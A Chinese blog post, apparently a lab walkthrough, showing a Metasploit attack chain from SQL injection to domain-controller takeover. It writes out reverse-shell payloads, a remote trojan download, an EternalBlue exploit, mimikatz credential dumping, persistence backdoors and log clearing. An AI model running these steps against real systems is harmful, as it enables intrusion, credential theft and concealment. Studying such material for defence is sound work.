Metasploit-縱深域控

本文作者: 重生信安 - 鯊魚(yú)

? ? ? ? ? ? ? ? ? ? ? ? 實(shí)驗(yàn)拓?fù)鋱D

? ? ? ? ? ? ? ? ? ? 0x02 入侵1號(hào)機(jī)

1號(hào)機(jī)模擬外網(wǎng)web應(yīng)用,找到注入點(diǎn)

判斷為整形盲注,直接sqlmap跑一下權(quán)限.

Sqlserver 2008數(shù)據(jù)庫(kù)sa權(quán)限,2008數(shù)據(jù)庫(kù)默認(rèn)禁用xp_cmdshell,需要手動(dòng)開(kāi)啟。

EXEC sp_configure 'show advanced options',1//允許修改高級(jí)參數(shù)

RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1? //打開(kāi)xp_cmdshell擴(kuò)展

RECONFIGURE

開(kāi)啟后直接從注入點(diǎn)利用xp_cmdshell,執(zhí)行系統(tǒng)命令添加賬戶等操作。我這里選擇遠(yuǎn)程下載木馬,運(yùn)行木馬對(duì)系統(tǒng)進(jìn)行控制。生成木馬并把木馬放在192.168.31.135 web上提供下載。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.45 lport=4444 -f exe > /home/1.exe //生成msf木馬文件

certutil -urlcache -split -f http://192.168.31.135/test.exe c:\1.exe //遠(yuǎn)程下載木馬程序

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 本機(jī)ip

set lport 本機(jī)監(jiān)聽(tīng)端口

run

再通過(guò)xp_cmdshell執(zhí)行木馬。

接收到shell,getuid 查看當(dāng)前用戶權(quán)限,shell? 進(jìn)入交互式shell,目標(biāo)不在此主機(jī),繼續(xù)進(jìn)行縱深。

background //掛起會(huì)話

route add 目標(biāo)網(wǎng)段 子掩碼? session號(hào) //添加一條路由去往目標(biāo)內(nèi)網(wǎng);

? ? ? ? ? ? ? ? ? ? ? 0x03 入侵2號(hào)機(jī)

通過(guò)路由轉(zhuǎn)發(fā)對(duì)目標(biāo)內(nèi)網(wǎng)ms17-010漏洞主機(jī)進(jìn)行探測(cè)。

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.192.1/24

set threads 50

Run

發(fā)現(xiàn)一臺(tái)存在ms17-010 漏洞主機(jī)2號(hào)機(jī),并設(shè)置exp進(jìn)行攻擊。

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.31.45

set lport 6666

set rhosts 192.168.192.135

Run

通過(guò)遠(yuǎn)程溢出拿下2號(hào)機(jī),添加用戶開(kāi)啟3389,3389端口轉(zhuǎn)發(fā)。

run getgui -e //開(kāi)啟3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.135//將192.135主機(jī)3389轉(zhuǎn)發(fā)本機(jī)111

rdesktop -u 賬號(hào)? -p 密碼? ? 本機(jī)ip:端口? ? // 遠(yuǎn)程連接

可以再添加一條路由繼續(xù)進(jìn)行掃描擴(kuò)大戰(zhàn)果。

? ? ? ? ? ? ? ? ? ? 0x04 入侵3號(hào)機(jī)

通過(guò)路由轉(zhuǎn)發(fā)繼續(xù)掃描脆弱主機(jī),smb弱口令

use auxiliary/scanner/smb/smb_login

set rhosts 192.168.192.1/24

set user_file /home/1.txt

set pass_file /home/2.txt

set threads 50

Run

192.168.192.129 弱口令 administrator 123456,目標(biāo)主機(jī)未開(kāi)啟3389,利用ipc入侵,回到2號(hào)機(jī)shell會(huì)話上 session -i 2 shell進(jìn)入交互會(huì)話。

net use \\192.168.192.129 "123456" /user:"administrator" //建立ipc連接

copy c:\\1.exe \\192.168.192.129\c$? ? //將本地c盤(pán)1.exe 拷貝到目標(biāo)c盤(pán)

net time \\192.168.192.129? ? //查看目標(biāo)時(shí)間

at \\192.168.192.129 23:59 c:\\1.exe? // 根據(jù)時(shí)間添加事件,時(shí)間一到執(zhí)行木馬

kali設(shè)置好監(jiān)聽(tīng)等待木馬執(zhí)行,反彈shell。

? ? ? ? ? ? ? ? ? ? 0x05 入侵4號(hào)機(jī)

利用3號(hào)機(jī)反彈的shell進(jìn)行arp嗅探。

load sniffer //加載嗅探模板

sniffer_interfaces //列出主機(jī)網(wǎng)卡

sniffer_start [數(shù)值]? //開(kāi)啟監(jiān)聽(tīng)

sniffer_dump 2 1.cap //導(dǎo)出監(jiān)聽(tīng)到的數(shù)據(jù)為1.cap

用戶登陸ftp,會(huì)被嗅探到明文密碼。

解cap嗅探包。

use auxiliary/sniffer/psnuffle

set pcapfile 1.cap

run

得到ftp明文木馬,然后遠(yuǎn)程到一臺(tái)主機(jī)通過(guò)ftp上傳webshell 大馬。

進(jìn)入大馬,找到可讀寫(xiě)目錄上傳木馬。

kali設(shè)置好監(jiān)聽(tīng)等待木馬執(zhí)行。

執(zhí)行并接收,權(quán)限很低利用getsystem提權(quán)失敗。

進(jìn)入shell,systeminfo命令查看已打的補(bǔ)丁,發(fā)現(xiàn)可以用ms15-051進(jìn)行提權(quán)。

search ms15 // 搜索ms15

額。。。。。好像提權(quán)失敗了,換思路先繞過(guò)UAC.

use exploit/windows/local/bypassuac

set session 4

Run

返回一個(gè)新的shell,進(jìn)入返回的新shell,直接getsystem進(jìn)行提權(quán)。

提權(quán)成功,接下來(lái)讀取明文密碼。

run hashdump //讀取用戶密碼hash

讀取失敗了,但是不要著急我們把shell注入到一個(gè)實(shí)體system進(jìn)程中。

ps? //查看所有進(jìn)程

migrate 1076? //將shell遷移到 1076 線程當(dāng)中

load mimikatz? //加載mimikatz

msv? //讀取用戶明文(hash)

拿到域管理用戶hash密碼,去破解一下。

? ? ? ? ? ? ? 0x06 拿下域控制器5號(hào)機(jī)

有了域控賬戶密碼可以在域里面暢通無(wú)阻,繼續(xù)用ipc拿下域控制器。

利用域管理員賬號(hào)密碼進(jìn)行ipc入侵,kali設(shè)置監(jiān)聽(tīng)得到反彈shell。

run getgui -e //開(kāi)啟3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.132

rdesktop -u administrator@guguyu.com -p P@ssw0rd 192.168.2.68:1111

成功拿下域控制器!

run persistence -X -i 5 -p 4444 -r 192.168.192.132 //向注冊(cè)表寫(xiě)入后門文件 開(kāi)機(jī)自啟 每5秒反彈一次shell

run metsvc //在主機(jī)上創(chuàng)建一個(gè)監(jiān)聽(tīng)31337端口的后門服務(wù)

clearev 清理痕跡。

不足之處,還請(qǐng)各位大佬多多指點(diǎn)?。。?!

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 運(yùn)行操作 CMD命令:開(kāi)始->運(yùn)行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小明yz閱讀 2,993評(píng)論 0 8
  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,502評(píng)論 0 11
  • 運(yùn)行操作 CMD命令:開(kāi)始->運(yùn)行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小沐子_IT閱讀 3,415評(píng)論 0 4
  • 命令簡(jiǎn)介 cmd是command的縮寫(xiě).即命令行 。 雖然隨著計(jì)算機(jī)產(chǎn)業(yè)的發(fā)展,Windows 操作系統(tǒng)的應(yīng)用越來(lái)...
    Littleston閱讀 3,423評(píng)論 0 12
  • 一、命令行 1. calc-----------啟動(dòng)計(jì)算器 2.certmgr.msc----證書(shū)管理實(shí)用程序 3...
    小小辛_c閱讀 765評(píng)論 0 2

友情鏈接更多精彩內(nèi)容